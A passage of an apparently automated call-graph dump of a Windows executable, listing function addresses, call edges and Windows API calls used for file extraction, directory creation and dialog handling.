25680 4fcba7 25677->25680 25678->25677 25682 4fcb8b FindWindowExW 25678->25682 25679->25680 25681 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25680->25681 25683 4fcbb2 25681->25683 25682->25677 25684 4fd243 25683->25684 25685 4fd255 25684->25685 25686 4e147c 43 API calls 25685->25686 25687 4fd2af 25686->25687 26326 4e20eb 25687->26326 25690 4fd2c5 25692 4e16b8 86 API calls 25690->25692 25691 4fd2d1 26333 4e1b0e 25691->26333 25694 4fd2cd 25692->25694 25695 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25694->25695 25697 4fd357 25695->25697 25696 4e16b8 86 API calls 25696->25694 25697->25437 25697->25441 25698 4fd2ed __InternalCxxFrameHandler ___std_exception_copy 25698->25696 25699->25480 25700->25435 25701->25504 25702->25529 25703->25534 25704->25541 25705->25547 25707->25478 25708->25499 25709->25468 25710->25461 25711->25560 25712->25558 25714 4fd87f GetMessageW 25713->25714 25715 4fd8b8 GetDlgItem 25713->25715 25716 4fd895 IsDialogMessageW 25714->25716 25717 4fd8a4 TranslateMessage DispatchMessageW 25714->25717 25715->25567 25715->25568 25716->25715 25716->25717 25717->25715 25719 4fd3b2 GetTokenInformation 25718->25719 25724 4fd409 25718->25724 25720 4fd3cc GetLastError 25719->25720 25721 4fd3d7 ___std_exception_copy 25719->25721 25720->25721 25720->25724 25722 4fd3e0 GetTokenInformation 25721->25722 25723 4fd3fa CopySid 25722->25723 25722->25724 25723->25724 25724->25578 25726 4ebeee 25725->25726 25727 4ebf1c 25726->25727 25728 4ebf0f CreateDirectoryW 25726->25728 25729 4ebccb 8 API calls 25727->25729 25728->25727 25730 4ebf4f 25728->25730 25731 4ebf22 25729->25731 25733 4ebf5e 25730->25733 25741 4ec2e5 25730->25741 25732 4ebf62 GetLastError 25731->25732 25734 4eda1e 6 API calls 25731->25734 25732->25733 25736 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25733->25736 25737 4ebf38 25734->25737 25738 4ebf85 25736->25738 25737->25732 25739 4ebf3c CreateDirectoryW 25737->25739 25738->25592 25739->25730 25739->25732 25740->25598 25742 501590 25741->25742 25743 4ec2f2 SetFileAttributesW 25742->25743 25744 4ec33f 25743->25744 25745 4ec314 25743->25745 25747 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25744->25747 25746 4eda1e 6 API calls 25745->25746 25748 4ec326 25746->25748 25749 4ec34d 25747->25749 25748->25744 25750 4ec32a SetFileAttributesW 25748->25750 25749->25733 25750->25744 25751->25628 25752->25628 25753->25632 25754->25628 25755->25628 25756->25628 25757->25636 25758->25628 25759->25620 25761 4f26ec _wcslen 25760->25761 25793 4e1925 25761->25793 25763 4f2704 25763->25647 25765 4e8deb __EH_prolog3 25764->25765 25806 4eee0f 25765->25806 25767 4e8e0e 25768 50121c 27 API calls 25767->25768 25769 4e8e52 __cftof 25768->25769 25770 50121c 27 API calls 25769->25770 25771 4e8e7a 25770->25771 25812 4f6b0d 25771->25812 25773 4e8eac 25773->25649 25775 4e8fff 25774->25775 25781 4e9080 25775->25781 25842 4ec37a 25775->25842 25777 4e9127 25779 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25777->25779 25782 4e914e 25779->25782 25780 4e90e5 25780->25777 25848 4e1407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25780->25848 25781->25780 25819 4e96b9 25781->25819 25784 4e8ebb 25782->25784 26314 4eab26 8 API calls __cftof 25784->26314 25786 4e8ee6 25788 4e8ef7 Concurrency::cancel_current_task 25786->25788 26315 4f4396 25786->26315 25789 4e2179 26 API calls 25788->25789 25790 4e8f1e 25789->25790 26321 4eeea4 86 API calls Concurrency::cancel_current_task 25790->26321 25794 4e1937 25793->25794 25801 4e198f 25793->25801 25795 4e1960 25794->25795 25803 4e7bad 76 API calls 2 library calls 25794->25803 25797 5066ae 22 API calls 25795->25797 25799 4e1980 25797->25799 25798 4e1956 25804 4e7c32 75 API calls 25798->25804 25799->25801 25805 4e7c32 75 API calls 25799->25805 25801->25763 25803->25798 25804->25795 25805->25801 25807 4eee1b __EH_prolog3 25806->25807 25808 50121c 27 API calls 25807->25808 25809 4eee59 25808->25809 25810 50121c 27 API calls 25809->25810 25811 4eee7d 25810->25811 25811->25767 25813 4f6b19 __EH_prolog3 25812->25813 25814 50121c 27 API calls 25813->25814 25815 4f6b33 25814->25815 25816 4f6b4a 25815->25816 25818 4f2f22 80 API calls 25815->25818 25816->25773 25818->25816 25820 4e96d4 25819->25820 25849 4e147c 25820->25849 25822 4e96fb 25823 4e970c 25822->25823 26012 4eb982 25822->26012 25827 4e9743 25823->25827 25859 4e1b63 25823->25859 25826 4e973f 25826->25827 25878 4e20a1 143 API calls __EH_prolog3 25826->25878 26004 4e16b8 25827->26004 25833 4e97e4 25879 4e988e 81 API calls 25833->25879 25835 4e97fe 25836 4e9842 25835->25836 25880 4f3cf2 25835->25880 25836->25827 25883 4e441e 25836->25883 25895 4e9906 25836->25895 25838 4e976b 25838->25833 25841 4ec37a 12 API calls 25838->25841 25841->25838 25843 4ec38f 25842->25843 25847 4ec3bd 25843->25847 26301 4ec4a8 25843->26301 25846 4ec3a4 FindClose 25846->25847 25847->25775 25848->25777 25850 4e1488 __EH_prolog3 25849->25850 25851 4eee0f 27 API calls 25850->25851 25852 4e14b7 25851->25852 25853 50121c 27 API calls 25852->25853 25856 4e152b 25852->25856 25854 4e1518 25853->25854 25854->25856 26016 4e668f 25854->26016 26024 4ecc45 25856->26024 25858 4e15b3 __cftof 25858->25822 25860 4e1b6f __EH_prolog3 25859->25860 25872 4e1bbc 25860->25872 25874 4e1cef 25860->25874 26062 4e145d 25860->26062 25863 4e1d21 26065 4e1407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25863->26065 25865 4e441e 117 API calls 25869 4e1d6c 25865->25869 25866 4e1d2e 25866->25865 25866->25874 25867 4e1db4 25871 4e1de7 25867->25871 25867->25874 26066 4e1407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25867->26066 25869->25867 25870 4e441e 117 API calls 25869->25870 25870->25869 25871->25874 25877 4eb8c0 79 API calls 25871->25877 25872->25863 25872->25866 25872->25874 25873 4e441e 117 API calls 25875 4e1e38 25873->25875 25874->25826 25875->25873 25875->25874 25876 4eb8c0 79 API calls 25876->25872 25877->25875 25878->25838 25879->25835 26080 50029f 25880->26080 25884 4e442e 25883->25884 25885 4e442a 25883->25885 25894 4eb8c0 79 API calls 25884->25894 25885->25836 25886 4e4440 25887 4e445b 25886->25887 25888 4e4469 25886->25888 25891 4e449b 25887->25891 26090 4e3ab7 105 API calls 3 library calls 25887->26090 26091 4e2fcb 117 API calls 3 library calls 25888->26091 25891->25836 25892 4e4467 25892->25891 26092 4e25f4 74 API calls 25892->26092 25894->25886 25896 4e9918 25895->25896 25899 4e997a 25896->25899 25908 4e9da2 Concurrency::cancel_current_task 25896->25908 26150 4fab94 118 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25896->26150 25897 4ea820 25900 4ea86c 25897->25900 25901 4ea825 25897->25901 25899->25897 25905 4e999b 25899->25905 25899->25908 25900->25908 26182 4fab94 118 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25900->26182 25901->25908 26181 4e8c06 168 API calls 25901->26181 25902 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25903 4ea862 25902->25903 25903->25836 25905->25908 26093 4e6936 25905->26093 25908->25902 25909 4e9a71 26099 4ed63a 25909->26099 25911 4e9bba 25911->25908 25918 4e9ce2 25911->25918 26153 4e9582 38 API calls 25911->26153 25913 4e9aa4 25913->25911 26151 4ebf89 57 API calls 4 library calls 25913->26151 25917 4e9c24 26152 509ea8 26 API calls 2 library calls 25917->26152 25920 4ec37a 12 API calls 25918->25920 25927 4e9d40 25918->25927 25920->25927 25921 4ea0ac 26162 4ef014 97 API calls 25921->26162 25924 4e9dd1 25943 4e9e33 25924->25943 26154 4e4916 27 API calls 2 library calls 25924->26154 26103 4e8f84 25927->26103 25929 4ea004 25930 4ea0c3 25929->25930 25934 4ea033 25929->25934 25932 4ea118 25930->25932 25947 4ea0ce 25930->25947 25936 4ea09b 25932->25936 26164 4e93ac 119 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25932->26164 25933 4ea116 25937 4eaf2f 80 API calls 25933->25937 25934->25936 25938 4ebccb 8 API calls 25934->25938 25942 4ea174 25934->25942 25935 4ea7d9 25939 4eaf2f 80 API calls 25935->25939 25936->25933 25936->25942 25937->25908 25941 4ea068 25938->25941 25939->25908 25941->25936 26161 4eac09 97 API calls 25941->26161 25942->25935 25959 4ea1e2 25942->25959 26165 4eb288 25942->26165 25943->25908 25944 4e9f71 25943->25944 25953 4e9f78 Concurrency::cancel_current_task 25943->25953 26155 4e8db7 41 API calls 25943->26155 26156 4ef014 97 API calls 25943->26156 26157 4e240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25943->26157 26158 4e953f 99 API calls 25943->26158 26159 4e240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25944->26159 25947->25933 26163 4e9155 123 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25947->26163 25950 4ea231 25955 4ec94d 27 API calls 25950->25955 25953->25929 26160 4ebd61 50 API calls 3 library calls 25953->26160 25972 4ea247 25955->25972 25957 4ea1d0 26169 4e7e45 77 API calls 25957->26169 26109 4ec94d 25959->26109 25960 4ea31d 25961 4ea37c 25960->25961 25962 4ea511 25960->25962 25963 4ea43c 25961->25963 25966 4ea394 25961->25966 25964 4ea537 25962->25964 25965 4ea523 25962->25965 25985 4ea3b5 25962->25985 25970 4ed63a 5 API calls 25963->25970 26124 4f53f0 25964->26124 26113 4eab81 25965->26113 25968 4ea3db 25966->25968 25977 4ea3a3 25966->25977 25968->25985 26172 4e88a9 113 API calls 25968->26172 25975 4ea466 25970->25975 25971 4ea2f4 25971->25960 26170 4eb427 82 API calls 25971->26170 25972->25960 25972->25971 25982 4eb1e6 79 API calls 25972->25982 25973 4ea550 26136 4f5099 25973->26136 26173 4e9582 38 API calls 25975->26173 26171 4e240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25977->26171 25980 4ea502 25980->25836 25982->25971 25984 4ea47e 25984->25985 25986 4ea4ab 25984->25986 25987 4ea494 25984->25987 25985->25980 25990 4ea5c5 25985->25990 26176 4ec905 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25985->26176 26175 4ea8b9 103 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25986->26175 26174 4e85fc 86 API calls 25987->26174 25995 4ea656 25990->25995 26177 4e240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25990->26177 25992 4ea764 25992->25935 25994 4ec2e5 8 API calls 25992->25994 25993 4ea712 26145 4eb7e2 25993->26145 25996 4ea7bf 25994->25996 25995->25935 25995->25992 25995->25993 26178 4eb949 SetEndOfFile 25995->26178 25996->25935 26179 4e240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25996->26179 25999 4ea759 26001 4eafd0 77 API calls 25999->26001 26001->25992 26002 4ea7cf 26180 4e7d49 76 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26002->26180 26005 4e16ca 26004->26005 26007 4e16dc Concurrency::cancel_current_task 26004->26007 26005->26007 26295 4e1729 26005->26295 26008 4e2179 26 API calls 26007->26008 26009 4e170b 26008->26009 26298 4eeea4 86 API calls Concurrency::cancel_current_task 26009->26298 26013 4eb999 26012->26013 26014 4eb9a3 26013->26014 26300 4e7c87 78 API calls 26013->26300 26014->25823 26017 4e669b __EH_prolog3 26016->26017 26032 4ed467 26017->26032 26019 4e66a5 26035 4f11a5 26019->26035 26021 4e66fc 26039 4e68b3 GetCurrentProcess GetProcessAffinityMask 26021->26039 26023 4e6719 26023->25856 26025 4ecc65 __cftof 26024->26025 26050 4ecb21 26025->26050 26030 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26031 4ecc95 26030->26031 26031->25858 26040 4ed4bd 26032->26040 26036 4f11b1 __EH_prolog3 26035->26036 26049 4e4a2c 41 API calls 26036->26049 26038 4f11ca 26038->26021 26039->26023 26041 4ed4cf __cftof 26040->26041 26044 4f31c2 26041->26044 26047 4f3184 GetCurrentProcess GetProcessAffinityMask 26044->26047 26048 4ed4b9 26047->26048 26048->26019 26049->26038 26057 4ecb02 26050->26057 26052 4ecb96 26053 4e2179 26052->26053 26054 4e2184 26053->26054 26055 4e2193 26053->26055 26061 4e13db 26 API calls Concurrency::cancel_current_task 26054->26061 26055->26030 26058 4ecb10 26057->26058 26059 4ecb0b 26057->26059 26058->26052 26060 4e2179 26 API calls 26059->26060 26060->26058 26061->26055 26067 4e18b2 26062->26067 26065->25874 26066->25871 26068 4e18c4 26067->26068 26069 4e1476 26067->26069 26070 4e18ed 26068->26070 26077 4e7bad 76 API calls 2 library calls 26068->26077 26069->25876 26072 5066ae 22 API calls 26070->26072 26074 4e190a 26072->26074 26073 4e18e3 26078 4e7c32 75 API calls 26073->26078 26074->26069 26079 4e7c32 75 API calls 26074->26079 26077->26073 26078->26070 26079->26069 26081 5002ac 26080->26081 26082 4f0597 53 API calls 26081->26082 26083 5002da 26082->26083 26084 4e4c00 _swprintf 51 API calls 26083->26084 26085 5002ec 26084->26085 26086 4ff7fc 21 API calls 26085->26086 26087 5002fd 26086->26087 26088 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26087->26088 26089 4f3d08 26088->26089 26089->25836 26090->25892 26091->25892 26092->25891 26094 4e6946 26093->26094 26183 4e6852 26094->26183 26096 4e69b1 26096->25909 26097 4e6979 26097->26096 26188 4ed122 6 API calls 3 library calls 26097->26188 26101 4ed644 26099->26101 26100 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26102 4ed7d8 26100->26102 26101->26100 26102->25913 26104 4e8f99 26103->26104 26105 4e8fd1 26104->26105 26199 4e7e25 74 API calls 26104->26199 26105->25908 26105->25921 26105->25924 26107 4e8fc9 26200 4e1407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26107->26200 26110 4ec95b 26109->26110 26112 4ec965 26109->26112 26111 50121c 27 API calls 26110->26111 26111->26112 26112->25950 26114 4eab8d __EH_prolog3 26113->26114 26201 4e8fdb 26114->26201 26117 4e145d 78 API calls 26118 4eab9b 26117->26118 26204 4ef0d7 26118->26204 26120 4eabf6 26120->25985 26122 4ef0d7 133 API calls 26123 4eabae 26122->26123 26123->26120 26123->26122 26215 4ef2c3 97 API calls __InternalCxxFrameHandler 26123->26215 26125 4f5405 26124->26125 26128 4f540f ___std_exception_copy 26124->26128 26241 4e7c32 75 API calls 26125->26241 26127 4f553f 26243 5047d0 RaiseException 26127->26243 26128->26127 26129 4f5495 26128->26129 26132 4f54b9 __cftof 26128->26132 26242 4f5323 133 API calls 3 library calls 26129->26242 26132->25973 26134 4f556b 26135 4f559d 26134->26135 26244 4f517f 133 API calls 26134->26244 26135->25973 26137 4f50cb 26136->26137 26139 4f50a2 26136->26139 26143 4f50bf 26137->26143 26261 4f7576 138 API calls 2 library calls 26137->26261 26140 4f50c1 26139->26140 26142 4f50b7 26139->26142 26139->26143 26260 4f8250 133 API calls 26140->26260 26245 4f8c7e 26142->26245 26143->25985 26146 4eb7f3 26145->26146 26149 4eb802 26145->26149 26147 4eb7f9 FlushFileBuffers 26146->26147 26146->26149 26147->26149 26148 4eb87f SetFileTime 26148->25999 26149->26148 26150->25899 26151->25917 26152->25911 26153->25918 26154->25943 26155->25943 26156->25943 26157->25943 26158->25943 26159->25953 26160->25929 26161->25936 26162->25953 26163->25933 26164->25936 26166 4eb291 GetFileType 26165->26166 26167 4ea1ba 26165->26167 26166->26167 26167->25959 26168 4e240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26167->26168 26168->25957 26169->25959 26170->25960 26171->25985 26172->25985 26173->25984 26174->25985 26175->25985 26176->25990 26177->25995 26178->25993 26179->26002 26180->25935 26181->25908 26182->25908 26189 4e6731 26183->26189 26186 4e6731 6 API calls 26187 4e6873 26186->26187 26187->26097 26188->26097 26190 4e673b 26189->26190 26191 4ed63a 5 API calls 26190->26191 26197 4e6765 26191->26197 26192 4e6833 26193 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26192->26193 26194 4e6845 26193->26194 26194->26186 26194->26187 26195 4ed63a 5 API calls 26195->26197 26197->26192 26197->26195 26198 4ed122 6 API calls 3 library calls 26197->26198 26198->26197 26199->26107 26200->26105 26202 4ed076 6 API calls 26201->26202 26203 4e8fe0 26202->26203 26203->26117 26212 4ef0ed __InternalCxxFrameHandler 26204->26212 26205 4ef25d 26206 4ef291 26205->26206 26216 4ef08e 26205->26216 26208 4ef2b2 26206->26208 26222 4e6c92 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26206->26222 26223 4f2ee4 26208->26223 26212->26205 26213 4ef254 26212->26213 26220 4eca4c 91 API calls __EH_prolog3 26212->26220 26221 4fab94 118 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26212->26221 26213->26123 26215->26123 26217 4ef096 26216->26217 26218 4ef0d3 26216->26218 26217->26218 26229 4f3ca6 26217->26229 26218->26206 26220->26212 26221->26212 26222->26208 26224 4f2eeb 26223->26224 26225 4f2f06 26224->26225 26239 4e7ba8 RaiseException std::_Xinvalid_argument 26224->26239 26227 4f2f17 SetThreadExecutionState 26225->26227 26240 4e7ba8 RaiseException std::_Xinvalid_argument 26225->26240 26227->26213 26232 50017f 26229->26232 26237 4f22ef 26232->26237 26234 500196 SendDlgItemMessageW 26235 4fd864 5 API calls 26234->26235 26236 4f3cc6 26235->26236 26236->26218 26238 4f22fd 26237->26238 26238->26234 26239->26225 26240->26227 26241->26128 26242->26132 26243->26134 26244->26134 26262 4f5617 26245->26262 26247 4ef0d7 133 API calls 26257 4f8c9d __InternalCxxFrameHandler 26247->26257 26248 4f90ae 26277 4f725b 98 API calls __InternalCxxFrameHandler 26248->26277 26250 4f90be __InternalCxxFrameHandler 26251 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26250->26251 26252 4f9108 26251->26252 26252->26143 26257->26247 26257->26248 26266 4f306d 26257->26266 26272 4f5e86 133 API calls 26257->26272 26273 4f9111 133 API calls 26257->26273 26274 4f32af 81 API calls 26257->26274 26275 4f5991 98 API calls __InternalCxxFrameHandler 26257->26275 26276 4f976f 138 API calls __InternalCxxFrameHandler 26257->26276 26260->26143 26261->26143 26264 4f5623 __EH_prolog3 __cftof ___std_exception_copy 26262->26264 26263 4f5709 26263->26257 26264->26263 26278 4e7c32 75 API calls 26264->26278 26267 4f3079 26266->26267 26270 4f307e 26266->26270 26279 4f3105 26267->26279 26269 4f308e 26269->26257 26270->26269 26287 4f32af 81 API calls 26270->26287 26272->26257 26273->26257 26274->26257 26275->26257 26276->26257 26277->26250 26278->26264 26280 4f317e 26279->26280 26284 4f3110 26279->26284 26280->26270 26281 4f3115 CreateThread 26281->26284 26291 4f3240 26281->26291 26283 4f316d SetThreadPriority 26283->26284 26284->26280 26284->26281 26284->26283 26288 4e7bad 76 API calls 2 library calls 26284->26288 26289 4e7d49 76 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26284->26289 26290 4e7ba8 RaiseException std::_Xinvalid_argument 26284->26290 26287->26269 26288->26284 26289->26284 26290->26284 26294 4f324e 84 API calls 26291->26294 26293 4f3249 26294->26293 26299 4e2155 26 API calls Concurrency::cancel_current_task 26295->26299 26297 4e1737 26299->26297 26300->26014 26302 4ec4b2 26301->26302 26303 4ec548 FindNextFileW 26302->26303 26304 4ec4e5 FindFirstFileW 26302->26304 26306 4ec553 GetLastError 26303->26306 26313 4ec52d 26303->26313 26305 4ec4f2 26304->26305 26304->26313 26307 4eda1e 6 API calls 26305->26307 26306->26313 26308 4ec505 26307->26308 26309 4ec509 FindFirstFileW 26308->26309 26310 4ec522 GetLastError 26308->26310 26309->26310 26309->26313 26310->26313 26311 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26312 4ec39f 26311->26312 26312->25846 26312->25847 26313->26311 26314->25786 26316 4f43a0 26315->26316 26317 4f43b9 26316->26317 26320 4f43cd 26316->26320 26322 4f2fc9 86 API calls 26317->26322 26319 4f43c0 Concurrency::cancel_current_task 26319->26320 26322->26319 26323->25671 26324->25671 26325->25674 26327 4eb982 78 API calls 26326->26327 26328 4e20f7 26327->26328 26329 4e1b63 117 API calls 26328->26329 26332 4e2114 26328->26332 26330 4e2104 26329->26330 26330->26332 26337 4e1407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26330->26337 26332->25690 26332->25691 26334 4e1b1e 26333->26334 26335 4e1b1a 26333->26335 26338 4e1a55 26334->26338 26335->25698 26337->26332 26339 4e1a67 26338->26339 26340 4e1aa4 26338->26340 26341 4e441e 117 API calls 26339->26341 26346 4e48bd 26340->26346 26344 4e1a87 26341->26344 26344->26335 26350 4e48c6 26346->26350 26347 4e441e 117 API calls 26347->26350 26348 4e1ac5 26348->26344 26351 4e1fb0 26348->26351 26349 4f2ee4 2 API calls 26349->26350 26350->26347 26350->26348 26350->26349 26352 4e1fbc __EH_prolog3 26351->26352 26363 4e44ab 26352->26363 26355 4e18b2 78 API calls 26356 4e1ff0 26355->26356 26395 4e199b 78 API calls 26356->26395 26358 4e2060 26358->26344 26359 4e2008 26361 4e2014 _wcslen 26359->26361 26396 4f3d10 MultiByteToWideChar 26359->26396 26397 4e199b 78 API calls 26361->26397 26364 4e44c6 26363->26364 26365 4e44f4 26364->26365 26366 4e4510 26364->26366 26398 4e1407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26365->26398 26367 4e476a 26366->26367 26371 4e453c 26366->26371 26404 4e1407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26367->26404 26370 4e44ff 26372 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26370->26372 26371->26370 26374 4f53f0 133 API calls 26371->26374 26373 4e1fdf 26372->26373 26373->26355 26373->26358 26379 4e4589 26374->26379 26375 4e45bb 26376 4e4646 26375->26376 26394 4e45b2 26375->26394 26401 4ef014 97 API calls 26375->26401 26378 4ec94d 27 API calls 26376->26378 26377 4e45b7 26377->26375 26400 4e25da 78 API calls 26377->26400 26385 4e4659 26378->26385 26379->26375 26379->26377 26380 4e45a7 26379->26380 26399 4e1407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26380->26399 26382 4f4396 86 API calls 26382->26370 26386 4e46f2 26385->26386 26387 4e46e2 26385->26387 26389 4f5099 138 API calls 26386->26389 26388 4eab81 138 API calls 26387->26388 26390 4e46f0 26388->26390 26389->26390 26402 4ec905 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26390->26402 26392 4e472a 26392->26394 26403 4e240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26392->26403 26394->26382 26395->26359 26396->26361 26397->26358 26398->26370 26399->26394 26400->26375 26401->26376 26402->26392 26403->26394 26404->26370 26782 50daed 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26783 50e680 GetProcessHeap 26717 4e1890 86 API calls Concurrency::cancel_current_task 26479 50bab0 26487 50d3ff 26479->26487 26482 50bac4 26484 50bacc 26485 50bad9 26484->26485 26495 50bae0 11 API calls 26484->26495 26488 50d2e8 _abort 5 API calls 26487->26488 26489 50d426 26488->26489 26490 50d43e TlsAlloc 26489->26490 26493 50d42f 26489->26493 26490->26493 26491 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26492 50baba 26491->26492 26492->26482 26494 50ba29 20 API calls 2 library calls 26492->26494 26493->26491 26494->26484 26495->26482 26719 5000b3 DialogBoxParamW 26499 50aaba 26510 50e180 26499->26510 26504 50aad7 26506 50bafa _free 20 API calls 26504->26506 26507 50ab0c 26506->26507 26508 50aae2 26509 50bafa _free 20 API calls 26508->26509 26509->26504 26511 50e189 26510->26511 26512 50aacc 26510->26512 26527 50e077 26511->26527 26514 50e580 GetEnvironmentStringsW 26512->26514 26515 50e597 26514->26515 26525 50e5ea 26514->26525 26516 50e59d WideCharToMultiByte 26515->26516 26519 50e5b9 26516->26519 26516->26525 26517 50e5f3 FreeEnvironmentStringsW 26518 50aad1 26517->26518 26518->26504 26526 50ab12 26 API calls 3 library calls 26518->26526 26520 50bc8e __vswprintf_c_l 21 API calls 26519->26520 26521 50e5bf 26520->26521 26522 50e5dc 26521->26522 26523 50e5c6 WideCharToMultiByte 26521->26523 26524 50bafa _free 20 API calls 26522->26524 26523->26522 26524->26525 26525->26517 26525->26518 26526->26508 26528 50b9a5 _abort 38 API calls 26527->26528 26529 50e084 26528->26529 26547 50e19e 26529->26547 26531 50e08c 26556 50de0b 26531->26556 26534 50bc8e __vswprintf_c_l 21 API calls 26535 50e0b4 26534->26535 26536 50e0e6 26535->26536 26563 50e240 26535->26563 26539 50bafa _free 20 API calls 26536->26539 26540 50e0a3 26539->26540 26540->26512 26541 50e0e1 26573 50bc7b 20 API calls _abort 26541->26573 26543 50e12a 26543->26536 26574 50dce1 26 API calls 26543->26574 26544 50e0fe 26544->26543 26545 50bafa _free 20 API calls 26544->26545 26545->26543 26548 50e1aa ___scrt_is_nonwritable_in_current_image 26547->26548 26549 50b9a5 _abort 38 API calls 26548->26549 26554 50e1b4 26549->26554 26551 50e238 _abort 26551->26531 26554->26551 26555 50bafa _free 20 API calls 26554->26555 26575 50b584 38 API calls _abort 26554->26575 26576 50d281 EnterCriticalSection 26554->26576 26577 50e22f LeaveCriticalSection _abort 26554->26577 26555->26554 26557 506dd4 __fassign 38 API calls 26556->26557 26558 50de1d 26557->26558 26559 50de2c GetOEMCP 26558->26559 26560 50de3e 26558->26560 26561 50de55 26559->26561 26560->26561 26562 50de43 GetACP 26560->26562 26561->26534 26561->26540 26562->26561 26564 50de0b 40 API calls 26563->26564 26565 50e25f 26564->26565 26568 50e2b0 IsValidCodePage 26565->26568 26570 50e266 26565->26570 26572 50e2d5 __cftof 26565->26572 26566 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26567 50e0d9 26566->26567 26567->26541 26567->26544 26569 50e2c2 GetCPInfo 26568->26569 26568->26570 26569->26570 26569->26572 26570->26566 26578 50dee3 GetCPInfo 26572->26578 26573->26536 26574->26536 26576->26554 26577->26554 26582 50df1d 26578->26582 26587 50dfc7 26578->26587 26581 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26584 50e073 26581->26584 26588 50efd8 26582->26588 26584->26570 26586 50d1c8 __vswprintf_c_l 43 API calls 26586->26587 26587->26581 26589 506dd4 __fassign 38 API calls 26588->26589 26590 50eff8 MultiByteToWideChar 26589->26590 26592 50f036 26590->26592 26600 50f0ce 26590->26600 26593 50f057 __cftof __vsnwprintf_l 26592->26593 26596 50bc8e __vswprintf_c_l 21 API calls 26592->26596 26595 50f0c8 26593->26595 26599 50f09c MultiByteToWideChar 26593->26599 26594 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26597 50df7e 26594->26597 26607 50d213 20 API calls _free 26595->26607 26596->26593 26602 50d1c8 26597->26602 26599->26595 26601 50f0b8 GetStringTypeW 26599->26601 26600->26594 26601->26595 26603 506dd4 __fassign 38 API calls 26602->26603 26604 50d1db 26603->26604 26608 50cfab 26604->26608 26607->26600 26609 50cfc6 __vswprintf_c_l 26608->26609 26610 50cfec MultiByteToWideChar 26609->26610 26611 50d1a0 26610->26611 26612 50d016 26610->26612 26613 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26611->26613 26617 50bc8e __vswprintf_c_l 21 API calls 26612->26617 26619 50d037 __vsnwprintf_l 26612->26619 26614 50d1b3 26613->26614 26614->26586 26615 50d080 MultiByteToWideChar 26616 50d0ec 26615->26616 26618 50d099 26615->26618 26644 50d213 20 API calls _free 26616->26644 26617->26619 26635 50d5bc 26618->26635 26619->26615 26619->26616 26623 50d0c3 26623->26616 26626 50d5bc __vswprintf_c_l 11 API calls 26623->26626 26624 50d0fb 26625 50bc8e __vswprintf_c_l 21 API calls 26624->26625 26629 50d11c __vsnwprintf_l 26624->26629 26625->26629 26626->26616 26627 50d191 26643 50d213 20 API calls _free 26627->26643 26629->26627 26630 50d5bc __vswprintf_c_l 11 API calls 26629->26630 26631 50d170 26630->26631 26631->26627 26632 50d17f WideCharToMultiByte 26631->26632 26632->26627 26633 50d1bf 26632->26633 26645 50d213 20 API calls _free 26633->26645 26636 50d2e8 _abort 5 API calls 26635->26636 26637 50d5e3 26636->26637 26640 50d5ec 26637->26640 26646 50d644 10 API calls 3 library calls 26637->26646 26639 50d62c 